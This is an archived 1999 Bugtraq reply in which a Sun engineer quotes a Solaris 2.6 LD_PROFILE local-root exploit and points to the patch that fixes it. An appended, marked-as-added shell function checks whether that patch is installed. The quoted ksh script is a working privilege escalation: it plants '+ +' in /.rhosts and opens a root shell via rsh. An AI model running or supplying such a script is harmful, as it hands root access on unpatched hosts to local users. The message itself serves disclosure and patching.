[11997] in bugtraq


Re: LD_PROFILE local root exploit for solaris 2.6

daemon@ATHENA.MIT.EDU (Darren Moffat - Solaris Sustaining)
Sun Sep 26 02:48:58 1999

Mime-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Content-Md5: 4Z54F1ajBqdnItZIYvEl9A==
Message-Id:  <199909240900.KAA04426@otis.UK.Sun.COM>
Date:         Fri, 24 Sep 1999 10:00:46 +0100
Reply-To: Darren Moffat - Solaris Sustaining Engineering <darren.moffat@sunuk.UK.Sun.COM>
From: Darren Moffat - Solaris Sustaining Engineering <darren.moffat@SUNUK.UK.SUN.COM>
X-To:         steve@TIGHTROPE.DEMON.CO.UK
To: BUGTRAQ@SECURITYFOCUS.COM

>works on solaris 2.6 sparc anyway...
>
>#! /bin/ksh
>#  LD_PROFILE local root exploit for solaris
>#  steve@tightrope.demon.co.uk 19990922
>umask 000
>ln -s /.rhosts /var/tmp/ps.profile
>export LD_PROFILE=/usr/bin/ps
>/usr/bin/ps
>echo + + >  /.rhosts
>rsh -l root localhost csh -i


This was bug# 4150646/1241843 which is fixed in patch 105490-05 (or higher),
which was released over 1 year ago (Sep/10/98)!

Patch 105490-07 is in the current recommended patch set for Solaris 2.6,
so it is publicly available.

I strongly recommend that people apply the latest recommended and security
patch sets when testing out security exploits.  That way you won't send
out information about exploits which have been long fixed and needlessly
panic people.

--
Darren J Moffat
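
Added example, not part of the original message and not a Sun tool: a shell check that reads `showrev -p` style output and reports whether patch 105490 is installed at revision 05 or higher, the level the reply above names as the fix. The function names and the sample patch lines are constructed for illustration; on Solaris 2.6 itself run it with AWK=nawk, because the stock awk there does not accept -v.

```shell
#!/bin/sh
# Reads `showrev -p` style lines on stdin.
# Exit status 0 if patch $1 is present at revision $2 or higher, else 1.
patch_at_least() {
    "${AWK:-awk}" -v base="$1" -v min="$2" '
        $1 == "Patch:" {
            # Second field is the patch id, e.g. 105490-07 (base-revision).
            n = split($2, id, "-")
            # Exact match on the base id; revisions compared as numbers,
            # so "05" and "5" are the same and "10" sorts above "09".
            if (n == 2 && id[1] == base && id[2] + 0 >= min + 0) ok = 1
        }
        END { exit (ok ? 0 : 1) }
    '
}

# Constructed sample input (not captured from a real host). An older and a
# newer revision of the same patch can both be listed; any revision at or
# above the minimum counts. 999999-09 is a made-up unrelated patch id.
sample_showrev() {
    cat <<'EOF'
Patch: 105490-04 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu
Patch: 999999-09 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu
Patch: 105490-07 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu
EOF
}

# Demo on the sample; on a live system use:  showrev -p | patch_at_least 105490 05
if sample_showrev | patch_at_least 105490 05; then
    echo "105490-05 or later installed: LD_PROFILE bug fixed"
else
    echo "105490-05 or later NOT installed"
fi
```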
